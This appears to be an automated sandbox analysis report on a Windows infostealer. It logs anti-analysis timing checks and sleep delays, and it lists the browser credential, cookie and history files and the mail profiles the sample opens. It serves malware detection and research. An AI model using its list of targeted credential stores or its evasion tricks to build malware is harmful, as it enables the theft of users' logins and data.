Source: C:\Users\user\Desktop\rFa24c148.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\rFa24c148.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Data Obfuscation

Source: Yara match File source: 00000000.00000002.2061274960.00000000052E5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004060E1
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
Source: C:\Users\user\Desktop\rFa24c148.exe File created: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll
Source: C:\Users\user\Desktop\rFa24c148.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\rFa24c148.exe API/Special instruction interceptor: Address: 5AE938D
Source: C:\Users\user\Desktop\rFa24c148.exe API/Special instruction interceptor: Address: 1FA938D
Source: C:\Users\user\Desktop\rFa24c148.exe RDTSC instruction interceptor: First address: 5AAAA11 second address: 5AAAA11 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F80C4ECD97Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rFa24c148.exe RDTSC instruction interceptor: First address: 1F6AA11 second address: 1F6AA11 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F80C48489FAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\rFa24c148.exe Memory allocated: 120000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rFa24c148.exe Memory allocated: 33440000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rFa24c148.exe Memory allocated: 33340000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599765
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599424
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599297
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599174
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599047
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598922
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598812
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598703
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598593
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598484
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598375
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598265
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598156
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598047
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597922
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597812
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597703
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597593
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597484
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597374
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597265
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597156
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597046
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596937
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596826
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596703
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596593
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596484
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596373
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596265
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596156
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596046
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595937
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595828
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595718
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595609
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595500
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595390
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595281
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595172
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595061
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594953
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594843
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594734
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594625
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594515
Source: C:\Users\user\Desktop\rFa24c148.exe Window / User API: threadDelayed 8391
Source: C:\Users\user\Desktop\rFa24c148.exe Window / User API: threadDelayed 1458
Source: C:\Users\user\Desktop\rFa24c148.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dll
Source: C:\Users\user\Desktop\rFa24c148.exe API coverage: 1.7 %
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep count: 37 > 30
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7872 Thread sleep count: 8391 > 30
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7872 Thread sleep count: 1458 > 30
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599765s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599656s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599547s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599424s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599297s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599174s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -599047s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598922s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598812s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598703s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598593s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598484s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598375s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598265s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598156s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -598047s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597922s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597812s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597703s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597593s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597484s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597374s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597265s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597156s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -597046s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596826s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596703s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596593s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596484s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596373s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596265s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596156s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -596046s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595937s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595828s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595718s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595609s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595500s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595390s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595281s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595172s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -595061s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -594953s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -594843s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -594734s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -594625s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868 Thread sleep time: -594515s >= -30000s
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004055FF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004060BA FindFirstFileW,FindClose, 0_2_004060BA
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_00402770 FindFirstFileW, 4_2_00402770
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_004055FF
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 4_2_004060BA FindFirstFileW,FindClose, 4_2_004060BA
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599875
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599765
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599656
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599547
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599424
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599297
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599174
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 599047
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598922
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598812
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598703
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598593
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598484
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598375
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598265
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598156
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 598047
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597922
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597812
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597703
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597593
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597484
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597374
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597265
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597156
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 597046
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596937
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596826
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596703
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596593
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596484
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596373
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596265
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596156
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 596046
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595937
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595828
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595718
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595609
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595500
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595390
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595281
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595172
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 595061
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594953
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594843
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594734
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594625
Source: C:\Users\user\Desktop\rFa24c148.exe Thread delayed: delay time: 594515
Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002E0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rFa24c148.exe, 00000004.00000002.2971357954.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(5
Source: C:\Users\user\Desktop\rFa24c148.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\rFa24c148.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004060E1
Source: C:\Users\user\Desktop\rFa24c148.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\rFa24c148.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\rFa24c148.exe Process created: C:\Users\user\Desktop\rFa24c148.exe "C:\Users\user\Desktop\rFa24c148.exe"
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Users\user\Desktop\rFa24c148.exe VolumeInformation
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\rFa24c148.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\rFa24c148.exe Code function: 0_2_00405D99 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405D99
Source: C:\Users\user\Desktop\rFa24c148.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rFa24c148.exe PID: 7732, type: MEMORYSTR
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\rFa24c148.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\rFa24c148.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match File source: 00000004.00000002.2993781136.0000000033547000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rFa24c148.exe PID: 7732, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000004.00000002.2993781136.0000000033441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rFa24c148.exe PID: 7732, type: MEMORYSTR